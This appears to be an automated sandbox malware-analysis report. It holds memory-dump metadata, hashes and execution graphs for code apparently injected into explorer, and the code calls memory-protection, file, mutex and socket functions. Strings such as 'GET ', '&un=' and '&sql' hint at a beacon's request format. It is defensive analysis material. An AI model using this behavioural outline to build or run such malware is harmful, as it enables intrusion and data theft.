                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: Rw$:%u
                                                                                                                                                                                    • API String ID: 48624451-2046040389
                                                                                                                                                                                    • Opcode ID: 53069e3b7901a03454950369296c19e662c142e46ed0272fa57d5454ba1c5f90
                                                                                                                                                                                    • Instruction ID: aec75a1bf031527e0b8b7065a6ec90293cba3a79b4a70ffb37eababfd009a452
                                                                                                                                                                                    • Opcode Fuzzy Hash: 53069e3b7901a03454950369296c19e662c142e46ed0272fa57d5454ba1c5f90
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4411B17250021AABCF10EFA9C8409BBB7ACEB54710B54452AF845D3142EB30E9058BB0
                                                                                                                                                                                    Function 00E03EBF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.429662493.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000D40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000E50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.429662493.0000000000EB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_d40000_ihbgfbin.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: Rw$:%u
                                                                                                                                                                                    • API String ID: 48624451-2046040389
                                                                                                                                                                                    • Opcode ID: 9c30df321e2c8aeb6f9811bb0974b653a6d20e29fa7319775970dd75286aecb7
                                                                                                                                                                                    • Instruction ID: 480604fdfe13a3588c8e3feca522b477cb1ee1416c0e69bb6a1069dcbc462d08
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c30df321e2c8aeb6f9811bb0974b653a6d20e29fa7319775970dd75286aecb7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 29119876E0020AAFCB20EF75C8419FBB3FCEBA4714B105529F955E7141EA34DA85C760

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:2.4%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                    Signature Coverage:4.7%
                                                                                                                                                                                    Total number of Nodes:444
                                                                                                                                                                                    Total number of Limit Nodes:16
                                                                                                                                                                                    execution_graph 13858 8cdfa4d 13859 8cdfa53 13858->13859 13862 8cd3782 13859->13862 13861 8cdfa6b 13864 8cd378f 13862->13864 13863 8cd37ad 13863->13861 13864->13863 13866 8cd8662 13864->13866 13867 8cd866b 13866->13867 13874 8cd87ba 13866->13874 13868 8cd20f2 6 API calls 13867->13868 13867->13874 13871 8cd86ee 13868->13871 13869 8cd8750 13870 8cd8791 13869->13870 13873 8cd883f 13869->13873 13869->13874 13870->13874 13876 8cddf82 6 API calls 13870->13876 13871->13869 13872 8cddf82 6 API calls 13871->13872 13872->13869 13873->13874 13875 8cddf82 6 API calls 13873->13875 13874->13863 13875->13874 13876->13874 13877 8cdee0a 13878 8cdd942 13877->13878 13879 8cdee45 NtProtectVirtualMemory 13878->13879 13880 8cdee70 13879->13880 13958 8cd714a 13959 8cd7153 13958->13959 13964 8cd7174 13958->13964 13961 8cd9382 ObtainUserAgentString 13959->13961 13960 8cd71e7 13962 8cd716c 13961->13962 13963 8cd20f2 6 API calls 13962->13963 13963->13964 13964->13960 13966 8cd21f2 13964->13966 13967 8cd220f 13966->13967 13968 8cd22c9 13966->13968 13969 8cdcf12 7 API calls 13967->13969 13971 8cd2242 13967->13971 13968->13964 13969->13971 13970 8cd2289 13970->13968 13972 8cd20f2 6 API calls 13970->13972 13971->13970 13973 8cd3432 NtCreateFile 13971->13973 13972->13968 13973->13970 13754 8cddf82 13755 8cddfb8 13754->13755 13756 8cda5b2 socket 13755->13756 13757 8cde081 13755->13757 13765 8cde022 13755->13765 13756->13757 13758 8cde134 13757->13758 13760 8cde117 getaddrinfo 13757->13760 13757->13765 13759 8cda732 connect 13758->13759 13764 8cde1b2 13758->13764 13758->13765 13759->13764 13760->13758 13761 8cda6b2 send 13763 8cde729 13761->13763 13762 8cde7f4 setsockopt recv 13762->13765 13763->13762 13763->13765 13764->13761 13764->13765 13503 8cd22dd 13504 8cd231a 13503->13504 13505 8cd23fa 13504->13505 13506 8cd2328 SleepEx 13504->13506 13510 8cdcf12 13504->13510 13519 8cd3432 13504->13519 13529 8cd20f2 13504->13529 13506->13504 13506->13506 13514 8cdcf48 13510->13514 13511 8cdd232 NtCreateFile 13511->13514 13512 8cdd125 13555 8cdc922 13512->13555 13514->13511 13517 8cdd0e9 13514->13517 13518 8cdd134 13514->13518 13535 8cddf82 13514->13535 13517->13512 13547 8cdc842 13517->13547 13518->13504 13520 8cd345b 13519->13520 13528 8cd34c9 13519->13528 13521 8cdd232 NtCreateFile 13520->13521 13520->13528 13522 8cd3496 13521->13522 13523 8cd34c5 13522->13523 13576 8cd3082 13522->13576 13524 8cdd232 NtCreateFile 13523->13524 13523->13528 13524->13528 13526 8cd34b6 13526->13523 13585 8cd2f52 13526->13585 13528->13504 13530 8cd21d3 13529->13530 13531 8cd2109 13529->13531 13530->13504 13590 8cd2012 13531->13590 13533 8cd2113 13533->13530 13534 8cddf82 6 API calls 13533->13534 13534->13530 13536 8cddfb8 13535->13536 13538 8cde081 13536->13538 13546 8cde022 13536->13546 13563 8cda5b2 13536->13563 13539 8cde134 13538->13539 13541 8cde117 getaddrinfo 13538->13541 13538->13546 13545 8cde1b2 13539->13545 13539->13546 13566 8cda732 13539->13566 13541->13539 13543 8cde7f4 setsockopt recv 13543->13546 13544 8cde729 13544->13543 13544->13546 13545->13546 13569 8cda6b2 13545->13569 13546->13514 13548 8cdc86d 13547->13548 13572 8cdd232 13548->13572 13550 8cdc906 13550->13517 13551 8cdc888 13551->13550 13552 8cddf82 6 API calls 13551->13552 13553 8cdc8c5 13551->13553 13552->13553 13553->13550 13554 8cdd232 NtCreateFile 13553->13554 13554->13550 13556 8cdc9c2 13555->13556 13557 8cdd232 NtCreateFile 13556->13557 13559 8cdc9d6 13557->13559 13558 8cdca9f 13558->13518 13559->13558 13560 8cdca5d 13559->13560 13562 8cddf82 6 API calls 13559->13562 13560->13558 13561 8cdd232 NtCreateFile 13560->13561 13561->13558 13562->13560 13564 8cda5ec 13563->13564 13565 8cda60a socket 13563->13565 13564->13565 13565->13538 13567 8cda788 connect 13566->13567 13568 8cda76a 13566->13568 13567->13545 13568->13567 13570 8cda705 send 13569->13570 13571 8cda6e7 13569->13571 13570->13544 13571->13570 13574 8cdd25c 13572->13574 13575 8cdd334 13572->13575 13573 8cdd410 NtCreateFile 13573->13575 13574->13573 13574->13575 13575->13551 13577 8cd3420 13576->13577 13578 8cd30aa 13576->13578 13577->13526 13578->13577 13579 8cdd232 NtCreateFile 13578->13579 13581 8cd31f9 13579->13581 13580 8cd33df 13580->13526 13581->13580 13582 8cdd232 NtCreateFile 13581->13582 13583 8cd33c9 13582->13583 13584 8cdd232 NtCreateFile 13583->13584 13584->13580 13586 8cd2f70 13585->13586 13587 8cd2f84 13585->13587 13586->13523 13588 8cdd232 NtCreateFile 13587->13588 13589 8cd3046 13588->13589 13589->13523 13591 8cd2031 13590->13591 13592 8cd20cd 13591->13592 13593 8cddf82 6 API calls 13591->13593 13592->13533 13593->13592 13766 8cd5edd 13768 8cd5f06 13766->13768 13767 8cd5fa4 13768->13767 13769 8cd28f2 NtProtectVirtualMemory 13768->13769 13770 8cd5f9c 13769->13770 13771 8cd9382 ObtainUserAgentString 13770->13771 13771->13767 13881 8cdfa1f 13882 8cdfa25 13881->13882 13885 8cd35f2 13882->13885 13884 8cdfa3d 13886 8cd360e 13885->13886 13887 8cd35fb 13885->13887 13886->13884 13887->13886 13888 8cd8662 6 API calls 13887->13888 13888->13886 13913 8cd5dd9 13915 8cd5df0 13913->13915 13914 8cd5ecd 13915->13914 13916 8cd9382 ObtainUserAgentString 13915->13916 13916->13914 13772 8cd7cd4 13774 8cd7cd8 13772->13774 13773 8cd8022 13774->13773 13778 8cd7352 13774->13778 13776 8cd7f0d 13776->13773 13787 8cd7792 13776->13787 13779 8cd739e 13778->13779 13780 8cd74ec 13779->13780 13781 8cd758e 13779->13781 13783 8cd7595 13779->13783 13782 8cdd232 NtCreateFile 13780->13782 13781->13776 13785 8cd74ff 13782->13785 13783->13781 13784 8cdd232 NtCreateFile 13783->13784 13784->13781 13785->13781 13786 8cdd232 NtCreateFile 13785->13786 13786->13781 13788 8cd77e0 13787->13788 13789 8cdd232 NtCreateFile 13788->13789 13791 8cd790c 13789->13791 13790 8cd7af3 13790->13776 13791->13790 13792 8cd7352 NtCreateFile 13791->13792 13793 8cd7602 NtCreateFile 13791->13793 13792->13791 13793->13791 13889 8cd3613 13890 8cd3620 13889->13890 13891 8cd3684 13890->13891 13892 8cdee12 NtProtectVirtualMemory 13890->13892 13892->13890 13746 8cdee12 13747 8cdee45 NtProtectVirtualMemory 13746->13747 13748 8cdd942 13746->13748 13749 8cdee70 13747->13749 13748->13747 13594 8cdebac 13595 8cdebb1 13594->13595 13628 8cdebb6 13595->13628 13629 8cd4b72 13595->13629 13597 8cdec2c 13598 8cdec85 13597->13598 13600 8cdec69 13597->13600 13601 8cdec54 13597->13601 13597->13628 13599 8cdcab2 NtProtectVirtualMemory 13598->13599 13604 8cdec8d 13599->13604 13602 8cdec6e 13600->13602 13603 8cdec80 13600->13603 13605 8cdcab2 NtProtectVirtualMemory 13601->13605 13606 8cdcab2 NtProtectVirtualMemory 13602->13606 13603->13598 13607 8cdec97 13603->13607 13665 8cd6102 13604->13665 13609 8cdec5c 13605->13609 13610 8cdec76 13606->13610 13611 8cdec9c 13607->13611 13612 8cdecbe 13607->13612 13651 8cd5ee2 13609->13651 13657 8cd5fc2 13610->13657 13633 8cdcab2 13611->13633 13615 8cdecd9 13612->13615 13616 8cdecc7 13612->13616 13612->13628 13621 8cdcab2 NtProtectVirtualMemory 13615->13621 13615->13628 13618 8cdcab2 NtProtectVirtualMemory 13616->13618 13620 8cdeccf 13618->13620 13675 8cd62f2 13620->13675 13622 8cdece5 13621->13622 13693 8cd6712 13622->13693 13631 8cd4b93 13629->13631 13630 8cd4cce 13630->13597 13631->13630 13632 8cd4cb5 CreateMutexExW 13631->13632 13632->13630 13634 8cdcadf 13633->13634 13642 8cdcebc 13634->13642 13705 8cd28f2 13634->13705 13636 8cdce5c 13637 8cd28f2 NtProtectVirtualMemory 13636->13637 13638 8cdce7c 13637->13638 13639 8cd28f2 NtProtectVirtualMemory 13638->13639 13640 8cdce9c 13639->13640 13641 8cd28f2 NtProtectVirtualMemory 13640->13641 13641->13642 13643 8cd5de2 13642->13643 13644 8cd5df0 13643->13644 13646 8cd5ecd 13644->13646 13730 8cd9382 13644->13730 13647 8cd2412 13646->13647 13649 8cd2440 13647->13649 13648 8cd2473 13648->13628 13649->13648 13650 8cd244d CreateThread 13649->13650 13650->13628 13653 8cd5f06 13651->13653 13652 8cd5fa4 13652->13628 13653->13652 13654 8cd28f2 NtProtectVirtualMemory 13653->13654 13655 8cd5f9c 13654->13655 13656 8cd9382 ObtainUserAgentString 13655->13656 13656->13652 13659 8cd6016 13657->13659 13658 8cd60f0 13658->13628 13659->13658 13662 8cd28f2 NtProtectVirtualMemory 13659->13662 13663 8cd60bb 13659->13663 13660 8cd60e8 13661 8cd9382 ObtainUserAgentString 13660->13661 13661->13658 13662->13663 13663->13660 13664 8cd28f2 NtProtectVirtualMemory 13663->13664 13664->13660 13667 8cd6137 13665->13667 13666 8cd62d5 13666->13628 13667->13666 13668 8cd28f2 NtProtectVirtualMemory 13667->13668 13669 8cd628a 13668->13669 13670 8cd28f2 NtProtectVirtualMemory 13669->13670 13673 8cd62a9 13670->13673 13671 8cd62cd 13672 8cd9382 ObtainUserAgentString 13671->13672 13672->13666 13673->13671 13674 8cd28f2 NtProtectVirtualMemory 13673->13674 13674->13671 13676 8cd6349 13675->13676 13677 8cd649f 13676->13677 13679 8cd28f2 NtProtectVirtualMemory 13676->13679 13678 8cd28f2 NtProtectVirtualMemory 13677->13678 13682 8cd64c3 13677->13682 13678->13682 13680 8cd6480 13679->13680 13681 8cd28f2 NtProtectVirtualMemory 13680->13681 13681->13677 13683 8cd28f2 NtProtectVirtualMemory 13682->13683 13684 8cd6597 13682->13684 13683->13684 13685 8cd28f2 NtProtectVirtualMemory 13684->13685 13686 8cd65bf 13684->13686 13685->13686 13687 8cd66b9 13686->13687 13690 8cd28f2 NtProtectVirtualMemory 13686->13690 13688 8cd66e1 13687->13688 13692 8cd28f2 NtProtectVirtualMemory 13687->13692 13689 8cd9382 ObtainUserAgentString 13688->13689 13691 8cd66e9 13689->13691 13690->13687 13691->13628 13692->13688 13694 8cd6767 13693->13694 13695 8cd28f2 NtProtectVirtualMemory 13694->13695 13700 8cd6903 13694->13700 13696 8cd68e3 13695->13696 13697 8cd28f2 NtProtectVirtualMemory 13696->13697 13697->13700 13698 8cd69b7 13699 8cd9382 ObtainUserAgentString 13698->13699 13702 8cd69bf 13699->13702 13701 8cd6992 13700->13701 13703 8cd28f2 NtProtectVirtualMemory 13700->13703 13701->13698 13704 8cd28f2 NtProtectVirtualMemory 13701->13704 13702->13628 13703->13701 13704->13698 13706 8cd2987 13705->13706 13709 8cd29b2 13706->13709 13720 8cd3622 13706->13720 13708 8cd2c0c 13708->13636 13709->13708 13710 8cd2ba2 13709->13710 13712 8cd2ac5 13709->13712 13711 8cdee12 NtProtectVirtualMemory 13710->13711 13719 8cd2b5b 13711->13719 13724 8cdee12 13712->13724 13714 8cdee12 NtProtectVirtualMemory 13714->13708 13715 8cd2ae3 13715->13708 13716 8cd2b3d 13715->13716 13717 8cdee12 NtProtectVirtualMemory 13715->13717 13718 8cdee12 NtProtectVirtualMemory 13716->13718 13717->13716 13718->13719 13719->13708 13719->13714 13722 8cd367a 13720->13722 13721 8cd3684 13721->13709 13722->13721 13723 8cdee12 NtProtectVirtualMemory 13722->13723 13723->13722 13725 8cdee45 NtProtectVirtualMemory 13724->13725 13728 8cdd942 13724->13728 13727 8cdee70 13725->13727 13727->13715 13729 8cdd967 13728->13729 13729->13725 13731 8cd93c7 13730->13731 13734 8cd9232 13731->13734 13733 8cd9438 13733->13646 13735 8cd925e 13734->13735 13738 8cd88c2 13735->13738 13737 8cd926b 13737->13733 13739 8cd8934 13738->13739 13740 8cd89a6 13739->13740 13741 8cd8995 ObtainUserAgentString 13739->13741 13740->13737 13741->13740 13893 8cd342e 13894 8cd345b 13893->13894 13902 8cd34c9 13893->13902 13895 8cdd232 NtCreateFile 13894->13895 13894->13902 13896 8cd3496 13895->13896 13898 8cd3082 NtCreateFile 13896->13898 13901 8cd34c5 13896->13901 13897 8cdd232 NtCreateFile 13897->13902 13899 8cd34b6 13898->13899 13900 8cd2f52 NtCreateFile 13899->13900 13899->13901 13900->13901 13901->13897 13901->13902 13994 8cda72e 13995 8cda788 connect 13994->13995 13996 8cda76a 13994->13996 13996->13995 13842 8cdfaa9 13843 8cdfaaf 13842->13843 13846 8cda212 13843->13846 13845 8cdfac7 13847 8cda21b 13846->13847 13848 8cda237 13846->13848 13847->13848 13849 8cda0c2 6 API calls 13847->13849 13848->13845 13849->13848 13903 8cd922a 13904 8cd925e 13903->13904 13905 8cd88c2 ObtainUserAgentString 13904->13905 13906 8cd926b 13905->13906 13794 8cda2e4 13795 8cda36f 13794->13795 13796 8cda305 13794->13796 13796->13795 13798 8cda0c2 13796->13798 13799 8cda0cb 13798->13799 13801 8cda1f0 13798->13801 13800 8cddf82 6 API calls 13799->13800 13799->13801 13800->13801 13801->13795 13974 8cd4b66 13976 8cd4b6a 13974->13976 13975 8cd4cce 13976->13975 13977 8cd4cb5 CreateMutexExW 13976->13977 13977->13975 13802 8cd7ce2 13804 8cd7dd9 13802->13804 13803 8cd8022 13804->13803 13805 8cd7352 NtCreateFile 13804->13805 13806 8cd7f0d 13805->13806 13806->13803 13807 8cd7792 NtCreateFile 13806->13807 13807->13806 13933 8cd5fbf 13934 8cd6016 13933->13934 13937 8cd60f0 13934->13937 13938 8cd28f2 NtProtectVirtualMemory 13934->13938 13939 8cd60bb 13934->13939 13935 8cd60e8 13936 8cd9382 ObtainUserAgentString 13935->13936 13936->13937 13938->13939 13939->13935 13940 8cd28f2 NtProtectVirtualMemory 13939->13940 13940->13935 13850 8cd88be 13852 8cd88c3 13850->13852 13851 8cd89a6 13852->13851 13853 8cd8995 ObtainUserAgentString 13852->13853 13853->13851 13854 8cda0b9 13855 8cda1f0 13854->13855 13856 8cda0ed 13854->13856 13856->13855 13857 8cddf82 6 API calls 13856->13857 13857->13855 13808 8cd60fb 13810 8cd6137 13808->13810 13809 8cd62d5 13810->13809 13811 8cd28f2 NtProtectVirtualMemory 13810->13811 13812 8cd628a 13811->13812 13813 8cd28f2 NtProtectVirtualMemory 13812->13813 13816 8cd62a9 13813->13816 13814 8cd62cd 13815 8cd9382 ObtainUserAgentString 13814->13815 13815->13809 13816->13814 13817 8cd28f2 NtProtectVirtualMemory 13816->13817 13817->13814 13907 8cdc83a 13908 8cdc841 13907->13908 13909 8cddf82 6 API calls 13908->13909 13911 8cdc8c5 13909->13911 13910 8cdc906 13911->13910 13912 8cdd232 NtCreateFile 13911->13912 13912->13910 13982 8cddf7a 13983 8cddfb8 13982->13983 13984 8cda5b2 socket 13983->13984 13985 8cde081 13983->13985 13993 8cde022 13983->13993 13984->13985 13986 8cde134 13985->13986 13988 8cde117 getaddrinfo 13985->13988 13985->13993 13987 8cda732 connect 13986->13987 13992 8cde1b2 13986->13992 13986->13993 13987->13992 13988->13986 13989 8cda6b2 send 13991 8cde729 13989->13991 13990 8cde7f4 setsockopt recv 13990->13993 13991->13990 13991->13993 13992->13989 13992->13993 13818 8cd62f4 13819 8cd6349 13818->13819 13820 8cd649f 13819->13820 13822 8cd28f2 NtProtectVirtualMemory 13819->13822 13821 8cd28f2 NtProtectVirtualMemory 13820->13821 13825 8cd64c3 13820->13825 13821->13825 13823 8cd6480 13822->13823 13824 8cd28f2 NtProtectVirtualMemory 13823->13824 13824->13820 13826 8cd28f2 NtProtectVirtualMemory 13825->13826 13827 8cd6597 13825->13827 13826->13827 13828 8cd28f2 NtProtectVirtualMemory 13827->13828 13830 8cd65bf 13827->13830 13828->13830 13829 8cd66e1 13831 8cd9382 ObtainUserAgentString 13829->13831 13832 8cd28f2 NtProtectVirtualMemory 13830->13832 13833 8cd66b9 13830->13833 13834 8cd66e9 13831->13834 13832->13833 13833->13829 13835 8cd28f2 NtProtectVirtualMemory 13833->13835 13835->13829 13836 8cd20f1 13837 8cd21d3 13836->13837 13838 8cd2109 13836->13838 13839 8cd2012 6 API calls 13838->13839 13840 8cd2113 13839->13840 13840->13837 13841 8cddf82 6 API calls 13840->13841 13841->13837 13917 8cd35f1 13918 8cd360e 13917->13918 13919 8cd3606 13917->13919 13920 8cd8662 6 API calls 13919->13920 13920->13918 13921 8cdf9f1 13922 8cdf9f7 13921->13922 13925 8cd4852 13922->13925 13924 8cdfa0f 13926 8cd4865 13925->13926 13927 8cd48e4 13925->13927 13926->13927 13929 8cd4887 13926->13929 13931 8cd487e 13926->13931 13927->13924 13928 8cda36f 13928->13924 13929->13927 13930 8cd8662 6 API calls 13929->13930 13930->13927 13931->13928 13932 8cda0c2 6 API calls 13931->13932 13932->13928 13941 8cdf9b3 13942 8cdf9bd 13941->13942 13945 8cd46d2 13942->13945 13944 8cdf9e0 13946 8cd4704 13945->13946 13947 8cd46f7 13945->13947 13949 8cd46ff 13946->13949 13950 8cd472d 13946->13950 13952 8cd4737 13946->13952 13948 8cd20f2 6 API calls 13947->13948 13948->13949 13949->13944 13954 8cda2c2 13950->13954 13952->13949 13953 8cddf82 6 API calls 13952->13953 13953->13949 13955 8cda2df 13954->13955 13956 8cda2cb 13954->13956 13955->13949 13956->13955 13957 8cda0c2 6 API calls 13956->13957 13957->13955 13750 8cdd232 13752 8cdd25c 13750->13752 13753 8cdd334 13750->13753 13751 8cdd410 NtCreateFile 13751->13753 13752->13751 13752->13753

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 08CDDF82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815networkCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 0 8cddf82-8cddfb6 1 8cddfb8-8cddfbc 0->1 2 8cddfd6-8cddfd9 0->2 1->2 3 8cddfbe-8cddfc2 1->3 4 8cddfdf-8cddfed 2->4 5 8cde8fe-8cde90c 2->5 3->2 6 8cddfc4-8cddfc8 3->6 7 8cde8f6-8cde8f7 4->7 8 8cddff3-8cddff7 4->8 6->2 11 8cddfca-8cddfce 6->11 7->5 9 8cddfff-8cde000 8->9 10 8cddff9-8cddffd 8->10 12 8cde00a-8cde010 9->12 10->9 10->12 11->2 13 8cddfd0-8cddfd4 11->13 14 8cde03a-8cde060 12->14 15 8cde012-8cde020 12->15 13->2 13->4 17 8cde068-8cde07c call 8cda5b2 14->17 18 8cde062-8cde066 14->18 15->14 16 8cde022-8cde026 15->16 16->7 19 8cde02c-8cde035 16->19 22 8cde081-8cde0a2 17->22 18->17 20 8cde0a8-8cde0ab 18->20 19->7 23 8cde144-8cde150 20->23 24 8cde0b1-8cde0b8 20->24 22->20 25 8cde8ee-8cde8ef 22->25 23->25 26 8cde156-8cde165 23->26 27 8cde0ba-8cde0dc call 8cdd942 24->27 28 8cde0e2-8cde0f5 24->28 25->7 30 8cde17f-8cde18f 26->30 31 8cde167-8cde178 call 8cda552 26->31 27->28 28->25 29 8cde0fb-8cde101 28->29 29->25 33 8cde107-8cde109 29->33 35 8cde1e5-8cde21b 30->35 36 8cde191-8cde1ad call 8cda732 30->36 31->30 33->25 40 8cde10f-8cde111 33->40 38 8cde22d-8cde231 35->38 39 8cde21d-8cde22b 35->39 47 8cde1b2-8cde1da 36->47 44 8cde247-8cde24b 38->44 45 8cde233-8cde245 38->45 43 8cde27f-8cde280 39->43 40->25 46 8cde117-8cde132 getaddrinfo 40->46 51 8cde283-8cde2e0 call 8cded62 call 8cdb482 call 8cdae72 call 8cdf002 43->51 48 8cde24d-8cde25f 44->48 49 8cde261-8cde265 44->49 45->43 46->23 50 8cde134-8cde13c 46->50 47->35 52 8cde1dc-8cde1e1 47->52 48->43 53 8cde26d-8cde279 49->53 54 8cde267-8cde26b 49->54 50->23 63 8cde2f4-8cde354 call 8cded92 51->63 64 8cde2e2-8cde2e6 51->64 52->35 53->43 54->51 54->53 69 8cde48c-8cde4b8 call 8cded62 call 8cdf262 63->69 70 8cde35a-8cde396 call 8cded62 call 8cdf262 call 8cdf002 63->70 64->63 65 8cde2e8-8cde2ef call 8cdb042 64->65 65->63 79 8cde4d9-8cde590 call 8cdf262 * 3 call 8cdf002 * 2 call 8cdb482 69->79 80 8cde4ba-8cde4d5 69->80 84 8cde398-8cde3b7 call 8cdf262 call 8cdf002 70->84 85 8cde3bb-8cde3e9 call 8cdf262 * 2 70->85 110 8cde595-8cde5b9 call 8cdf262 79->110 80->79 84->85 101 8cde3eb-8cde410 call 8cdf002 call 8cdf262 85->101 102 8cde415-8cde41d 85->102 101->102 105 8cde41f-8cde425 102->105 106 8cde442-8cde448 102->106 107 8cde467-8cde487 call 8cdf262 105->107 108 8cde427-8cde43d 105->108 109 8cde44e-8cde456 106->109 106->110 107->110 108->110 109->110 113 8cde45c-8cde45d 109->113 120 8cde5bb-8cde5cc call 8cdf262 call 8cdf002 110->120 121 8cde5d1-8cde6ad call 8cdf262 * 7 call 8cdf002 call 8cded62 call 8cdf002 call 8cdae72 call 8cdb042 110->121 113->107 132 8cde6af-8cde6b3 120->132 121->132 135 8cde6ff-8cde72d call 8cda6b2 132->135 136 8cde6b5-8cde6fa call 8cda382 call 8cda7b2 132->136 144 8cde75d-8cde761 135->144 145 8cde72f-8cde735 135->145 153 8cde8e6-8cde8e7 136->153 149 8cde90d-8cde913 144->149 150 8cde767-8cde76b 144->150 145->144 148 8cde737-8cde74c 145->148 148->144 154 8cde74e-8cde754 148->154 155 8cde779-8cde784 149->155 156 8cde919-8cde920 149->156 157 8cde8aa-8cde8df call 8cda7b2 150->157 158 8cde771-8cde773 150->158 153->25 154->144 163 8cde756 154->163 159 8cde795-8cde796 155->159 160 8cde786-8cde793 155->160 156->160 157->153 158->155 158->157 164 8cde79c-8cde7a0 159->164 160->159 160->164 163->144 167 8cde7b1-8cde7b2 164->167 168 8cde7a2-8cde7af 164->168 170 8cde7b8-8cde7c4 167->170 168->167 168->170 173 8cde7f4-8cde861 setsockopt recv 170->173 174 8cde7c6-8cde7ef call 8cded92 call 8cded62 170->174 177 8cde8a3-8cde8a4 173->177 178 8cde863 173->178 174->173 177->157 178->177 181 8cde865-8cde86a 178->181 181->177 184 8cde86c-8cde872 181->184 184->177 186 8cde874-8cde8a1 184->186 186->177 186->178
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000009.00000002.930049677.0000000008C80000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_8c80000_explorer.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: getaddrinforecvsetsockopt
                                                                                                                                                                                    • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                                                                                                                    • API String ID: 1564272048-1117930895
                                                                                                                                                                                    • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                    • Instruction ID: 123b144f33fc621204de8d67ec8f008424b6959888652af1e279348eeb709c89
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4525C34614B088BDB69FF68D4847E9B7F1FB54301F50462ED5ABCB246EE30A54ACB81
                                                                                                                                                                                    Function 08CDD232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 303 8cdd232-8cdd256 304 8cdd8bd-8cdd8cd 303->304 305 8cdd25c-8cdd260 303->305 305->304 306 8cdd266-8cdd2a0 305->306 307 8cdd2bf 306->307 308 8cdd2a2-8cdd2a6 306->308 310 8cdd2c6 307->310 308->307 309 8cdd2a8-8cdd2ac 308->309 311 8cdd2ae-8cdd2b2 309->311 312 8cdd2b4-8cdd2b8 309->312 313 8cdd2cb-8cdd2cf 310->313 311->310 312->313 314 8cdd2ba-8cdd2bd 312->314 315 8cdd2f9-8cdd30b 313->315 316 8cdd2d1-8cdd2f7 call 8cdd942 313->316 314->313 320 8cdd378 315->320 321 8cdd30d-8cdd332 315->321 316->315 316->320 324 8cdd37a-8cdd3a0 320->324 322 8cdd334-8cdd33b 321->322 323 8cdd3a1-8cdd3a8 321->323 325 8cdd33d-8cdd360 call 8cdd942 322->325 326 8cdd366-8cdd370 322->326 327 8cdd3aa-8cdd3d3 call 8cdd942 323->327 328 8cdd3d5-8cdd3dc 323->328 325->326 326->320 332 8cdd372-8cdd373 326->332 327->320 327->328 329 8cdd3de-8cdd40a call 8cdd942 328->329 330 8cdd410-8cdd458 NtCreateFile call 8cdd172 328->330 329->320 329->330 339 8cdd45d-8cdd45f 330->339 332->320 339->320 340 8cdd465-8cdd46d 339->340 340->320 341 8cdd473-8cdd476 340->341 342 8cdd478-8cdd481 341->342 343 8cdd486-8cdd48d 341->343 342->324 344 8cdd48f-8cdd4b8 call 8cdd942 343->344 345 8cdd4c2-8cdd4ec 343->345 344->320 350 8cdd4be-8cdd4bf 344->350 351 8cdd8ae-8cdd8b8 345->351 352 8cdd4f2-8cdd4f5 345->352 350->345 351->320 353 8cdd4fb-8cdd4fe 352->353 354 8cdd604-8cdd611 352->354 355 8cdd55e-8cdd561 353->355 356 8cdd500-8cdd507 353->356 354->324 361 8cdd567-8cdd572 355->361 362 8cdd616-8cdd619 355->362 358 8cdd509-8cdd532 call 8cdd942 356->358 359 8cdd538-8cdd559 356->359 358->320 358->359 366 8cdd5e9-8cdd5fa 359->366 367 8cdd574-8cdd59d call 8cdd942 361->367 368 8cdd5a3-8cdd5a6 361->368 364 8cdd61f-8cdd626 362->364 365 8cdd6b8-8cdd6bb 362->365 373 